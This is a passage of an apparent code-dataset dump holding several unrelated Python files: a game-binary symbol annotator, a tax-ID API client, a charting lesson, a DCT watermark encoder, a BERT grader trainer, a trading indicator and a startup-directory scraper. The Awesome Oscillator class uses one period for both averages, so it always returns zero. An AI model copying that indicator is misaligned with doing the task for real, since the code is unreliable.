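The same span-summing idea as ScrapHTML.py above, but on an inline document so it runs without a network fetch; the HTML snippet is made up.

```python
from bs4 import BeautifulSoup

html = "<span>10</span><p>skip</p><span>32</span>"
soup = BeautifulSoup(html, "html.parser")
# soup("span") is shorthand for soup.find_all("span")
print(sum(int(tag.contents[0]) for tag in soup("span")))  # 42
```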
floats, strings, pointers, TTYD evts) and values.\"\"\"\n# Jonathan Aldrich 2021-01-26 ~ 2021-03-04\n\nimport codecs\nimport os\nimport sys\nimport numpy as np\nimport pandas as pd\nfrom pathlib import Path\n\nimport jdalibpy.bindatastore as bd\nimport jdalibpy.flags as flags\n\nFLAGS = flags.Flags()\n\n# Output directory; should contain these outputs from previous binaries:\n# - Section_info and linked sections from dump_sections.py\n# - map_symbols.csv file from map_to_symbols.py\n# Annotated symbols will be saved to /annotated_symbols.csv.\nFLAGS.DefineString(\"out_path\", \"\")\n\n# Whether to display debug strings.\nFLAGS.DefineInt(\"debug_level\", 1)\n\nclass AnnotateMapSymbolsError(Exception):\n def __init__(self, message=\"\"):\n self.message = message\n \ndef _InferType(view, size, exact):\n \"\"\"Uses simple heuristics to try to determine the type/value of a symbol.\"\"\"\n def _IsFloatCompatible(view, offset=0):\n u32 = view.ru32(offset)\n # Either 0.0 or in range +/- 1e-7 to 1e7.\n return not u32 or (0x33d6bf95 <= (u32 & 2**31-1) <= 0x4b189680)\n \n def _IsDoubleCompatible(view, offset=0):\n u64 = view.ru64(offset)\n # Either 0.0 or in range +/- 1e-7 to 1e7.\n return not u64 or (\n 0x3e7ad7f29abcaf48 <= (u64 & 2**63-1) <= 0x416312d000000000)\n \n def _IsPointerCompatible(view, offset=0):\n u32 = view.ru32(offset)\n # Either 0.0 or in slightly reduced range of valid pointers\n # (the range is reduced so as to not be ambiguous w/valid Shift-JIS).\n return not u32 or (0x80000000 <= u32 < 0x81400000)\n \n def _IsEvtCompatible(view, size, exact):\n offset = 0\n last_command = -1\n while offset < size:\n command = view.ru32(offset)\n # Each command must be between 0x1 and 0x77.\n if not (1 <= command & 0xffff <= 0x77):\n return False\n # Must end in 00000002, 00000001 (RETURN, END).\n if last_command == 2 and command == 1:\n if not exact:\n return True\n # Verify that this is the exact end of the evt command array.\n return offset + 4 == size\n # Advance by 4 bytes, plus 4 per argument to the evt command.\n offset += (command >> 16) * 4 + 4\n last_command = command\n # Reached maximum length of symbol without finding the end of an event.\n return False\n \n def _IsShiftJisCompatible(view, size, exact):\n offset = 0\n while offset < size:\n b = view.ru8(offset)\n if b == 0:\n # If not exactly at the end of the string, return False.\n if exact and offset + 1 != size:\n return False\n # End of string; double-check for false multi-byte sequences.\n try:\n s = codecs.decode(view.rcstring(0), \"shift-jis\")\n except:\n return False\n # String should be technically valid, but make sure\n # that string isn't empty or a likely false positive.\n return not (view.rcstring(0) in (b\"\", b\"\\x40\", b\"C0\"))\n elif 0x20 <= b < 0x7f or b in (9, 10, 13):\n # Printable one-byte sequence.\n offset += 1\n elif 0x81 <= b < 0xa0 or 0xe0 <= b <= 0xea or 0xed <= b <= 0xef:\n if offset + 1 == size:\n return False\n # Valid multi-byte sequence.\n b2 = view.ru8(offset + 1)\n if not 0x40 <= b2 <= 0xfc:\n return False\n offset += 2\n else:\n return False\n return False\n \n def _SanitizeString(s):\n s = s.replace(\"\\\\\", \"\\\\\\\\\")\n s = s.replace(\"\\t\", \"\\\\t\")\n s = s.replace(\"\\n\", \"\\\\n\")\n s = s.replace(\"\\r\", \"\\\\r\")\n return s\n\n bs = view.rbytes(size)\n # Check most restrictive types first: valid evts, common float constants, \n # Shift-JIS compatible strings of the exact length of the symbol.\n if exact and size & 3 == 0 and _IsEvtCompatible(view, size, exact=True):\n return 
(\"evt\", \"\")\n if size == 8 and view.ru64() == 0x4330000080000000:\n return (\"double\", \"to-int\")\n if size == 8 and view.ru64() == 0x4330000000000000:\n return (\"double\", \"to-int-mask\")\n if exact and _IsShiftJisCompatible(view, size, exact=True):\n s = codecs.decode(view.rcstring(), \"shift-jis\")\n return (\"string\", _SanitizeString(s))\n # If all zero bytes, return \"zero\".\n if sum(bs) == 0:\n return (\"zero\", 0.0)\n # Check for reasonable-looking floating-point, pointer, or vec3 values.\n if size == 4 and _IsFloatCompatible(view):\n return (\"float\", view.rf32())\n if size == 8 and _IsDoubleCompatible(view):\n return (\"double\", view.rf64())\n if size == 4 and _IsPointerCompatible(view):\n return (\"pointer\", \"%08x\" % view.ru32())\n if size == 12:\n if (_IsFloatCompatible(view, 0) and _IsFloatCompatible(view, 4) and\n _IsFloatCompatible(view, 8)):\n return (\"vec3\", \"%f, %f, %f\" % (\n view.rf32(0), view.rf32(4), view.rf32(8)))\n # Look for arbitrary floating-point arrays or non-exact-length evts/strings;\n # these are more likely to be false positives.\n if size & 3 == 0:\n if _IsEvtCompatible(view, size, exact=False):\n return (\"evt\", \"\")\n # TODO: Improve heuristics for detecting float arrays vs. strings?\n is_valid = True\n for offset in range(0, size, 4):\n if not _IsFloatCompatible(view, offset):\n is_valid = False\n break\n if is_valid:\n return (\"floatarr\", \"\")\n is_valid = True\n for offset in range(0, size, 4):\n if not _IsPointerCompatible(view, offset):\n is_valid = False\n break\n if is_valid:\n return (\"pointerarr\", \"\")\n if _IsShiftJisCompatible(view, size, exact=False):\n s = codecs.decode(view.rcstring(), \"shift-jis\")\n return (\"string\", _SanitizeString(s))\n # Not obviously compatible with any common types.\n return (None, None)\n \ndef _AnnotateSymbols(symbols, section_info, out_path):\n def _AddSectionInfoFields(s, section_info):\n section = section_info.loc[(s[\"area\"], s[\"sec_id\"])]\n s[\"sec_name\"] = section[\"name\"]\n s[\"sec_type\"] = section[\"type\"]\n ram_addr = section[\"ram_start\"]\n s[\"ram_addr\"] = (\n \"%08x\" % (int(ram_addr, 16) + int(s[\"sec_offset\"], 16))\n if isinstance(ram_addr, str) and ram_addr else np.nan\n )\n file_addr = section[\"file_start\"]\n s[\"file_addr\"] = (\n \"%08x\" % (int(file_addr, 16) + int(s[\"sec_offset\"], 16))\n if isinstance(file_addr, str) and file_addr else np.nan\n )\n return s\n \n def _InferSymbolType(s, stores):\n # Not a data symbol.\n if s[\"sec_type\"] != \"data\":\n return s\n # Symbol's section was not dumped, or out of range.\n section_lookup = \"%s-%02d\" % (s[\"area\"], s[\"sec_id\"])\n if section_lookup not in stores:\n return s\n offset = int(s[\"sec_offset\"], 16)\n if offset < 0:\n return s\n # Otherwise, infer the type and value of the symbol, if possible.\n view = stores[section_lookup].view(offset)\n (t, v) = _InferType(view, int(s[\"size\"], 16), exact=True)\n if t:\n s[\"type\"] = t\n s[\"value\"] = v\n return s\n\n # Create a copy of the symbols DataFrame with the desired output columns.\n df = pd.DataFrame(symbols, columns=[\n \"area\", \"sec_id\", \"sec_offset\", \"sec_name\", \"sec_type\", \"ram_addr\",\n \"file_addr\", \"name\", \"namespace\", \"size\", \"align\", \"type\", \"value\"])\n \n # Load previously dumped .DOL / .REL file sections into BDStores.\n stores = {}\n for sec_id in (0, 1, 7, 8, 9, 10, 11, 12):\n section_path = \"sections/_main/%02d.raw\" % sec_id\n store = bd.BDStore(big_endian=True)\n store.RegisterFile(out_path / section_path, 
offset=0)\n stores[\"_main-%02d\" % sec_id] = store\n \n rels_dir = out_path / \"sections/rel_linked\"\n areas = [f.name for f in os.scandir(rels_dir) if f.is_dir()]\n for area in areas:\n for sec_id in range(1,6):\n store = bd.BDStore(big_endian=True)\n store.RegisterFile(rels_dir / area / (\"%02d.raw\" % sec_id), offset=0)\n stores[\"%s-%02d\" % (area, sec_id)] = store\n \n # Fill in remaining columns based on section_info and dumped sections.\n if FLAGS.GetFlag(\"debug_level\"):\n print(\"Converting section offsets to ram/file addresses...\")\n df = df.apply(\n lambda s: _AddSectionInfoFields(s, section_info), axis=1)\n \n if FLAGS.GetFlag(\"debug_level\"):\n print(\"Inferring symbol types...\")\n df = df.apply(lambda s: _InferSymbolType(s, stores), axis=1)\n \n # Output the final table of joined symbols.\n df.to_csv(out_path / \"annotated_symbols.csv\", index=False)\n\ndef main(argc, argv):\n out_path = FLAGS.GetFlag(\"out_path\")\n if not out_path or not os.path.exists(Path(out_path)):\n raise AnnotateMapSymbolsError(\n \"--out_path must point to a valid directory.\")\n out_path = Path(out_path)\n \n if not os.path.exists(out_path / \"section_info.csv\"):\n raise AnnotateMapSymbolsError(\n \"You must first run dump_sections.py using the same --out_path.\")\n section_info = pd.read_csv(out_path / \"section_info.csv\")\n section_info = section_info.set_index([\"area\", \"id\"])\n \n if not os.path.exists(out_path / \"map_symbols.csv\"):\n raise AnnotateMapSymbolsError(\n \"You must first run map_to_symbols.py using the same --out_path.\")\n symbols = pd.read_csv(out_path / \"map_symbols.csv\")\n \n _AnnotateSymbols(symbols, section_info, out_path)\n\nif __name__ == \"__main__\":\n (argc, argv) = FLAGS.ParseFlags(sys.argv[1:])\n main(argc, argv)\n","repo_name":"jdaster64/ttyd-utils","sub_path":"source/annotate_map_symbols.py","file_name":"annotate_map_symbols.py","file_ext":"py","file_size_in_byte":10579,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"12262648616","text":"import requests\nfrom django.conf import settings \nimport json\n\ndef conseguir_TOKEN(client_id,client_secret):\n URL = f\"https://api-seguridad.sunat.gob.pe/v1/clientesextranet/{client_id}/oauth2/token/\"\n headers = {\n 'Content-Type': 'application/x-www-form-urlencoded'\n }\n json = {\n \"grant_type\": \"client_credentials\",\n \"scope\" :\"https://api.sunat.gob.pe/v1/contribuyente/contribuyentes\",\n \"client_id\" :client_id ,\n \"client_secret\" :client_secret,\n }\n response = requests.post(URL,data=json,headers=headers)\n return response.json()[\"access_token\"]\n\ndef validar_ruc(data : dict[str,any]) -> dict[str:any]:\n url = f'https://api.sunat.gob.pe/v1/contribuyente/contribuyentes/{data[\"numRuc\"]}/validarcomprobante'\n\n headers : dict[str:str] = {\n \"Authorization\" : \"Bearer \"+ conseguir_TOKEN( settings.CLIENT_ID,settings.CLIENT_SECRET)\n }\n\n body : dict[str: any] = dict(data.items())\n \n if not body[\"monto\"]: del body[\"monto\"]\n del body[\"csrfmiddlewaretoken\"]\n \n\n response = requests.post(url,json=body,headers=headers)\n print(response.content)\n return response.json()\n\ndef validar_numero_ruc(n_ruc)-> list[bool,dict[str:any]]:\n URL = f\"https://api.apis.net.pe/v1/ruc?numero={n_ruc}\"\n \n JSON = requests.get(url=URL)\n response: dict[str:any] = JSON.json()\n if response.get(\"error\",None):\n return [False, response]\n return 
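On the annotate_map_symbols record above: the magic ranges in _InferType's float checks come from reinterpreting the 32-bit word as an IEEE-754 single. A self-contained check with struct:

```python
import struct

def f32_from_bits(u):
    # reinterpret a 32-bit unsigned integer as an IEEE-754 single
    return struct.unpack(">f", struct.pack(">I", u))[0]

print(f32_from_bits(0x33d6bf95))  # ~1e-07, the lower bound used above
print(f32_from_bits(0x4b189680))  # 10000000.0, the upper bound
```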
[True,response]\n\n","repo_name":"feijoes/Freelance-works","sub_path":"Python/DjangoSunat/contabilidad/api/libs.py","file_name":"libs.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7439828253","text":"\"\"\"复式条形统计图和平均数\n\n关于程序的几点说明:\n1. 程序改进了 data1.py (G417) 中的 Data 类,使绘制条形统计图的方法 bar() 和 barh() 现在可以绘制表现多行数据的\n 复式条形统计图。\n2. 程序还为 Data 类增添了两个新的方法 avg_row() 和 avg_col(),分别用于求指定行或列数据的平均数。\n\"\"\"\n\nimport sys\nfrom pathlib import Path\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n# 把上级目录添加到模块搜索路径,以便引用其它项目模块。\nsys.path.append(str(Path(__file__).parents[1]))\nfrom g323_table.table import Table\n\n\nclass Data(Table):\n \"\"\"Data 类是 Table 类的子类。Data 类继承了 Table 类的属性和方法,还拥有绘制复式条形统计图以及求平均数的方法。\n\n 方法\n ----\n bar(*row): 为给定的一行或多行数据绘制纵向复式条形统计图。\n barh(*row): 为给定的一行或多行数据绘制横向复式条形统计图。\n avg_row(row): 计算第 row 行数据的平均数,如果没有指定 row, 计算每一行数据的平均数。\n avg_col(col): 计算第 col 列数据的平均数,如果没有指定 col, 计算每一列数据的平均数。\n \"\"\"\n def bar(self, *rows, title=None, xlabel=None, ylabel=None, int_tick=True):\n \"\"\"为表格中给定的一行或多行数据绘制纵向复式条形统计图。\n\n rows: 绘制哪几行数据,默认是所有行。\n title: 复式条形统计图的标题。\n xlabel: 复式条形统计图横轴说明。\n ylabel: 复式条形统计图纵轴说明。\n int_tick: 刻度值是否必须为整数。\n \"\"\"\n _, ax = plt.subplots(figsize=(10, 6))\n ax.yaxis.set_major_locator(plt.MaxNLocator(integer=int_tick))\n # 如果一行都没给,绘制所有行。\n n = len(rows)\n if n == 0:\n n = self.row_count\n rows = tuple(range(n))\n # 根据一组竖条的数目,设置一组竖条的宽度。\n if n == 1:\n WIDTH = 0.4\n elif n < 5:\n WIDTH = 0.6\n else:\n WIDTH = 0.8\n # 获取一个竖条的宽度。\n width = WIDTH / n\n x = range(self.col_count)\n for i, row in enumerate(rows):\n # 获取代表一行数据的一组竖条,每个竖条中点的位置。\n pos = [value - WIDTH/2 + width/2 + width * i for value in x]\n rect = ax.bar(pos, self.data[row], width=width, label=self.row_headers[row])\n ax.bar_label(rect)\n ax.set_xticks(x, self.col_headers)\n ax.set_title(title)\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n ax.legend()\n plt.show()\n\n def barh(self, *rows, title=None, xlabel=None, ylabel=None, int_tick=True):\n \"\"\"为表格中给定的一行或多行数据绘制横向复式条形统计图。\n\n rows: 绘制哪几行数据,默认是所有行。\n title: 复式条形统计图的标题。\n xlabel: 复式条形统计图横轴说明。\n ylabel: 复式条形统计图纵轴说明。\n int_tick: 刻度值是否必须为整数。\n \"\"\"\n _, ax = plt.subplots(figsize=(10, 6))\n ax.xaxis.set_major_locator(plt.MaxNLocator(integer=int_tick))\n # 如果一行都没给,绘制所有行。\n n = len(rows)\n if n == 0:\n n = self.row_count\n rows = tuple(range(n))\n # 根据一组竖条的数目,设置一组竖条的高度。\n if n == 1:\n HEIGHT = 0.4\n elif n < 5:\n HEIGHT = 0.6\n else:\n HEIGHT = 0.8\n # 获取一个竖条的高度。\n height = HEIGHT / n\n y = range(self.col_count)\n for i, row in enumerate(rows):\n # 获取代表一行数据的一组竖条,每个竖条中点的位置。\n pos = [value + HEIGHT/2 - height/2 - height * i for value in y]\n rect = ax.barh(pos, self.data[row], height=height, label=self.row_headers[row])\n ax.bar_label(rect)\n ax.set_yticks(y, self.col_headers)\n ax.set_title(title)\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n ax.legend()\n plt.show()\n\n def avg_row(self, row=None, rounding=0):\n \"\"\"计算第 row 行数据的平均数,如果没有指定 row, 返回一个包含每一行数据平均数的列表。\n\n row: 计算哪一行数据的平均数。如果没指定,计算每一行数据的平均数。\n rounding: 平均数保留几位小数。\n \"\"\"\n def avg_one_row(row):\n \"\"\"计算第 row 行数据的平均数。\"\"\"\n avg = sum(self.data[row])/self.col_count\n if rounding == 0:\n return round(avg)\n return round(avg, rounding)\n\n if row is not None:\n return avg_one_row(row)\n avgs = []\n for i in range(self.row_count):\n avgs.append(avg_one_row(i))\n return avgs\n\n def avg_col(self, col=None, rounding=0):\n \"\"\"计算第 col 列数据的平均数,如果没有指定 col, 返回一个包含每一列数据平均数的列表。\n\n col: 
计算哪一列数据的平均数。如果没指定,计算每一列数据的平均数。\n rounding: 平均数保留几位小数。\n \"\"\"\n def avg_one_col(col):\n \"\"\"计算第 col 列数据的平均数。\"\"\"\n total = 0\n for i in range(self.row_count):\n total += self.data[i][col]\n avg = total / self.row_count\n if rounding == 0:\n return round(avg)\n return round(avg, rounding)\n\n if col is not None:\n return avg_one_col(col)\n avgs = []\n for j in range(self.col_count):\n avgs.append(avg_one_col(j))\n return avgs\n\n\nTITLE = '喜欢某种蔬菜的学生人数统计图'\nLABEL_ITEM = '蔬菜'\nLABEL_VALUE = '喜欢的人数'\nVEGETABLES = ['西红柿', '萝卜', '黄瓜', '茄子']\nCLASSES = ['一班', '二班', '三班']\n\n# 创建 data 对象并生成 data 对象的数据。\ndata = Data(row_headers=CLASSES, col_headers=VEGETABLES)\ndata.random()\nprint(data)\n\n# 显示每行的平均数和每列的平均数。\nprint(f'每行的平均数是: {data.avg_row()}')\nprint(f'每列的平均数是: {data.avg_col()}')\n\n# 在 Matplotlib 中使用中文字体,SimHei 是 Windows 的内置字体,Arial Unicode MS 是 MacOS 的内置字体。\nfont_names = ['SimHei', 'Arial Unicode MS']\nmpl.rcParams['font.sans-serif'] = font_names + mpl.rcParams['font.sans-serif']\n\n# 绘制纵向和横向复式条形统计图。\ndata.bar(title=TITLE, xlabel=LABEL_ITEM, ylabel=LABEL_VALUE)\ndata.barh(title=TITLE, ylabel=LABEL_ITEM, xlabel=LABEL_VALUE)\n","repo_name":"feli10/math-coding","sub_path":"_cn/g428_mean_value/data2.py","file_name":"data2.py","file_ext":"py","file_size_in_byte":6826,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40040244976","text":"# Mohammad Qureshi\r\n# PSID 1789301\r\n# LAB 12.7\r\n\r\n\r\n# FUNCTION TO INPUT AGE AND SET ERROR MESSAGES\r\ndef get_age():\r\n input_age = int(input())\r\n if input_age < 18:\r\n raise ValueError(\"Invalid age.\")\r\n if input_age > 75:\r\n raise ValueError(\"Invalid age.\")\r\n return input_age\r\n\r\n# CALCULATE HEART RATE\r\ndef fat_burning_heart_rate(age): # function to calculate heart rate\r\n heart_rate = (((220 - age) * 70) / 100)\r\n return heart_rate\r\n\r\n# MAIN FUNCTION\r\nif __name__ == \"__main__\":\r\n try:\r\n age = get_age()\r\n heart_rate = fat_burning_heart_rate(age)\r\n print(\"Fat burning heart rate for a {} year-old: {} bpm\".format(age, heart_rate))\r\n except ValueError as errormsg:\r\n print(errormsg)\r\n print(\"Could not calculate heart rate info.\")\r\n print()\r\n","repo_name":"MohammadQu/Summer2348","sub_path":"Homework4/ZyLab12.7.py","file_name":"ZyLab12.7.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19512279250","text":"from loguru import logger\n\nfrom ..domain.model import Quote\nfrom ..foundation import Pair\nfrom ..repository.quote_repo import QuoteRepo\n\n\nclass GetLastRateUseCase:\n def __init__(self, quote_repo: QuoteRepo) -> None:\n self._quote_repo = quote_repo\n\n async def excecute(self, pair: Pair) -> Quote:\n try:\n quote = await self._quote_repo.get_last_quote(pair=pair)\n except self._quote_repo.NotFound as ex:\n logger.error(f\"Can't get last quote for {pair} {ex}\")\n raise\n return quote\n","repo_name":"kancom/jaxel_task","sub_path":"src/trial/application/use_case/last_rate_uc.py","file_name":"last_rate_uc.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41471521277","text":"import cv2\nimport numpy as np\n\nclass DctEncoder:\n\n def __init__(self, key=None, alpha=20):\n self.key = key\n self.alpha = alpha\n\n def read_wm(self, wm):\n self.wm = wm[0]\n\n def wm_capacity(self, frame_shape):\n row, col, channels = frame_shape\n block_num 
= row * col // 64\n return (1, block_num)\n\n def encode(self, yuv):\n blk_shape = (8, 8)\n channel = yuv[:,:,1]\n lum_mask = self.luminance_mask(yuv[:,:,0])\n tex_mask = self.texture_mask(yuv[:,:,0])\n mask = tex_mask * lum_mask\n c = 0\n for i in range(channel.shape[0] // blk_shape[0]):\n for j in range(channel.shape[1] // blk_shape[1]):\n blk = channel[i * blk_shape[0] : i * blk_shape[0] + blk_shape[0],\n j * blk_shape[1] : j * blk_shape[1] + blk_shape[1]]\n coeffs = cv2.dct(blk)\n step = self.alpha * mask[i][j]\n step2 = step + step\n if self.wm[c] == 0:\n coeffs[2][1] = np.sign(coeffs[2][1]) * np.floor(abs(coeffs[2][1]) / step2) * step2\n else:\n coeffs[2][1] = np.sign(coeffs[2][1]) * (np.floor(abs(coeffs[2][1]) / step2) * step2 + step)\n channel[i * blk_shape[0] : i * blk_shape[0] + blk_shape[0],\n j * blk_shape[1] : j * blk_shape[1] + blk_shape[1]] = cv2.idct(coeffs)\n c += 1\n return yuv\n\n def luminance_mask(self, lum):\n blk_shape = (8, 8)\n rows = lum.shape[0] // blk_shape[0]\n cols = lum.shape[1] // blk_shape[1]\n mask = np.zeros((rows, cols))\n for i in range(rows):\n for j in range(cols):\n blk = lum[i * blk_shape[0]:i * blk_shape[0] + blk_shape[0],\n j * blk_shape[1]:j * blk_shape[1] + blk_shape[1]]\n coeffs = cv2.dct(blk)\n mask[i][j] = coeffs[0][0]\n l_min, l_max = 90, 255\n f_max = 2\n mask /= 8\n mean = max(l_min, np.mean(mask))\n f_ref = 1 + (mean - l_min) * (f_max - 1) / (l_max - l_min)\n for i in range(mask.shape[0]):\n for j in range(mask.shape[1]):\n if mask[i][j] > mean:\n mask[i][j] = 1 + (mask[i][j] - mean) / (l_max - mean) * (f_max - f_ref)\n elif mask[i][j] < 15:\n mask[i][j] = 1.25\n elif mask[i][j] < 25:\n mask[i][j] = 1.125\n else:\n mask[i][j] = 1\n return mask\n\n\n def texture_mask(self, lum):\n blk_shape = (8, 8)\n rows = lum.shape[0] // blk_shape[0]\n cols = lum.shape[1] // blk_shape[1]\n mask = np.full((rows, cols), 1.0)\n for i in range(rows):\n for j in range(cols):\n blk = lum[i * blk_shape[0]:i * blk_shape[0] + blk_shape[0],\n j * blk_shape[1]:j * blk_shape[1] + blk_shape[1]]\n coeffs = cv2.dct(blk)\n coeffs = np.abs(coeffs)\n dcl = coeffs[0][0] + coeffs[0][1] + coeffs[0][2] + coeffs[1][0] + coeffs[1][1] + coeffs[2][0]\n eh = np.sum(coeffs) - dcl\n if eh > 125:\n e = coeffs[3][0] + coeffs[4][0] + coeffs[5][0] + coeffs[6][0] + \\\n coeffs[0][3] + coeffs[0][4] + coeffs[0][5] + coeffs[0][6] + \\\n coeffs[2][1] + coeffs[1][2] + coeffs[2][2] + coeffs[3][3]\n h = eh - e\n l = dcl - coeffs[0][0]\n a1, b1 = 2.3, 1.6\n a2, b2 = 1.4, 1.1\n l_e, le_h = l / e, (l + e) / h\n if eh > 900:\n if (l_e >= a2 and le_h >= b2) or (l_e >= b2 and le_h >= a2) or le_h > 4:\n mask[i][j] = 1.125 if l + e <= 400 else 1.25\n else:\n mask[i][j] = 1 + 1.25 * (eh - 290) / (1800 - 290)\n else:\n if (l_e >= a1 and le_h >= b1) or (l_e >= b1 and le_h >= a1) or le_h > 4:\n mask[i][j] = 1.125 if l + e <= 400 else 1.25\n elif e + h > 290:\n mask[i][j] = 1 + 1.25 * (eh - 290) / (1800 - 290)\n return mask\n","repo_name":"eluv-io/offmark-py","sub_path":"src/offmark/embed/dct_encoder.py","file_name":"dct_encoder.py","file_ext":"py","file_size_in_byte":4344,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"31749543927","text":"import torch\r\nfrom torch.utils.data import Dataset, DataLoader\r\nfrom transformers import BertTokenizer, BertForSequenceClassification\r\nimport os\r\nimport logging\r\n\r\nclass AssignmentDataset(Dataset):\r\n def __init__(self, assignments, tokenizer, max_length=512):\r\n self.assignments = 
assignments\r\n self.tokenizer = tokenizer\r\n self.max_length = max_length\r\n\r\n def __len__(self):\r\n return len(self.assignments)\r\n\r\n def __getitem__(self, idx):\r\n assignment = self.assignments[idx]\r\n encodings = self.tokenizer(assignment['brief'] + ' ' + assignment['assignment'],\r\n truncation=True,\r\n max_length=self.max_length,\r\n padding='max_length',\r\n return_tensors='pt')\r\n encodings['labels'] = torch.tensor([assignment['grade']])\r\n return {key: val.squeeze() for key, val in encodings.items()}\r\n\r\ndef train(model, data_loader, optimizer):\r\n model.train()\r\n total_loss = 0\r\n for idx, batch in enumerate(data_loader):\r\n optimizer.zero_grad()\r\n output = model(**batch)\r\n loss = output.loss\r\n loss.backward()\r\n optimizer.step()\r\n total_loss += loss.item()\r\n if (idx + 1) % 10 == 0:\r\n logger.info(f'Batch: {idx + 1}, Loss: {total_loss / (idx + 1)}')\r\n\r\n\r\ndef load_data(guidance_file, assignment_dir):\r\n with open(guidance_file, 'r', encoding='utf-8') as f:\r\n guidance = f.read()\r\n\r\n assignments = []\r\n assignment_files = [f for f in os.listdir(assignment_dir) if not f.endswith('_grade.txt')]\r\n for assignment_file in assignment_files:\r\n with open(os.path.join(assignment_dir, assignment_file), 'r', encoding='utf-8') as f:\r\n assignment = f.read()\r\n \r\n grade_file = assignment_file.replace('.txt', '_grade.txt')\r\n with open(os.path.join(assignment_dir, grade_file), 'r', encoding='utf-8') as f:\r\n grade_text = f.read().strip()\r\n if grade_text == 'U':\r\n grade = 0\r\n elif grade_text == 'Pass':\r\n grade = 1\r\n elif grade_text == 'Merit':\r\n grade = 2\r\n elif grade_text == 'Distinction':\r\n grade = 3\r\n else:\r\n raise ValueError(f'Invalid grade: {grade_text}')\r\n\r\n assignments.append({\r\n \"brief\": guidance,\r\n \"assignment\": assignment,\r\n \"grade\": grade\r\n })\r\n return assignments\r\n\r\nlogging.basicConfig(level=logging.INFO)\r\nlogger = logging.getLogger(__name__)\r\n\r\ndef main():\r\n logging.basicConfig(level=logging.INFO)\r\n logger = logging.getLogger(__name__)\r\n\r\n logger.info(\"Loading data...\")\r\n assignments = load_data('guidance.txt', 'assignments')\r\n logger.info(f\"Loaded {len(assignments)} assignments.\")\r\n\r\n logger.info(\"Loading tokenizer...\")\r\n tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\r\n\r\n logger.info(\"Creating dataset and dataloader...\")\r\n dataset = AssignmentDataset(assignments, tokenizer)\r\n data_loader = DataLoader(dataset, batch_size=8, shuffle=True)\r\n\r\n logger.info(\"Loading model...\")\r\n model = BertForSequenceClassification.from_pretrained('bert-base-uncased', num_labels=4)\r\n \r\n logger.info(\"Setting up optimizer...\")\r\n optimizer = torch.optim.Adam(model.parameters(), lr=1e-5)\r\n\r\n logger.info(\"Starting training...\")\r\n for epoch in range(10):\r\n logger.info(f'Starting epoch {epoch + 1}')\r\n train(model, data_loader, optimizer)\r\n logger.info(\"Training complete.\")\r\n \r\n logger.info(\"Saving model...\")\r\n torch.save(model.state_dict(), f'model.pt')\r\n logger.info(\"Model saved.\")\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n","repo_name":"Cossy179/Grade-Marker-Bert","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19342655980","text":"from bfxhfindicators.indicator import Indicator\nfrom bfxhfindicators.sma import SMA\n\nclass AO(Indicator):\n def 
__init__(self, period, cache_size=None):\n self._smaShort = SMA(period, cache_size)\n self._smaLong = SMA(period, cache_size)\n\n super().__init__({\n 'args': [period, cache_size],\n 'id': 'ao',\n 'name': 'AO',\n 'seed_period': None,\n 'data_type': 'candle',\n 'data_key': '*',\n 'cache_size': cache_size\n })\n\n def reset(self):\n super().reset()\n\n self._smaShort.reset()\n self._smaLong.reset()\n\n def update(self, candle):\n v = (candle['high'] + candle['low']) / 2\n\n self._smaShort.update(v)\n self._smaLong.update(v)\n\n super().update(self._smaShort.v() - self._smaLong.v())\n return self.v()\n\n def add(self, candle):\n v = (candle['high'] + candle['low']) / 2\n\n self._smaShort.add(v)\n self._smaLong.add(v)\n\n super().add(self._smaShort.v() - self._smaLong.v())\n return self.v()\n ","repo_name":"bitfinexcom/bfx-hf-indicators-py","sub_path":"bfxhfindicators/awesome_oscillator.py","file_name":"awesome_oscillator.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"48"} +{"seq_id":"39061160294","text":"\"\"\"\nTask\nCopy the company name into the sheet.\nCopy the website link into the sheet\nCopy the CEO's name into the sheet\nCopy the CEO's LinkedIn Profile link into the sheet.\n\"\"\"\nfrom bs4 import BeautifulSoup\nimport requests\nimport brotli\nimport json\nimport time\nimport random\n\n# Load data from API retrieved on scraper_api.py\nwith open('./site.json','r', encoding=\"utf8\") as response:\n response_py = json.load(response)\n\n# Get the result of the query\nresponse_list = list(response_py.values())\ncompanies = response_list[0][0]['hits']\n\n# Instantiate 3 list to store slugs, names and websites of each company, and the final dict.\nslugs = []\n\nnames = []\n\nwebsites = []\n\ncompanies_data = {}\n\nfor company in companies:# This for loop take each company of the JSON file and save the requested data.\n slug = company['slug']\n name = company['_highlightResult'][\"name\"][\"value\"] # Copy the company name into the sheet.\n website = company['_highlightResult'][\"website\"][\"value\"]# Copy the website link into the sheet\n\n slugs.append(slug) #I store in memory to loop over this list and get access to each particular company details.\n\n companies_data[slug] = {'Company name':name,'Website':website}\n\nprint('json done')\n\nlog_dict = {} #Store any failure in the for loop\n\nfor slug in slugs:\n\n print(slug)\n\n url=f'https://www.ycombinator.com/companies/{slug}'\n\n session = requests.Session()\n session.headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.62'\n session.headers['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'\n session.headers['Accept-Encoding'] = 'gzip, deflate, br'\n session.headers['Accept-Lenguaje'] = 